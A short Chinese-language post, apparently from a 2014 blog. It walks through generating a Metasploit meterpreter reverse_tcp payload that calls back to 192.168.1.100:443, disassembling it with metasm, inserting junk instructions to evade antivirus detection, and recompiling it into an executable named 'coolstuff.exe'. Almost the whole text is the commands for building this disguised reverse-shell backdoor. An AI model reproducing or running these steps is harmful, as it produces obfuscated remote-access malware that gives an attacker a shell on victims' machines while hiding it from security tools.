alittleyatou 2014-09-30
技术本质还是花指令,本文的目的是使用metasploit框架来生成rawpayload,反汇编payload,使用花指令,然后重新编译成二进制可执行文件
1.msfpayloadwindows/meterpreter/reverse_tcpLHOST=192.168.1.100LPORT=443R>raw_binary
2.拷贝metasm.rb文件和metasm文件夹到ruby的安装目录
cp/usr/share/metasploit-framework/lib/metasm.rb/usr/local/lib/site_ruby/1.9.1/
cp-r/usr/share/metasploit-framework/lib/metasm/usr/local/lib/site_ruby/1.9.1/
3.ruby/usr/share/metasploit-framework/lib/metasm/samples/disassemble.rbraw_binary>test.asm
4.编辑花指令。关键一点,栈平衡
5.ruby/usr/local/lib/site_ruby/1.9.1/metasm/samples/peencode.rbtest.asm-ocoolstuff.exe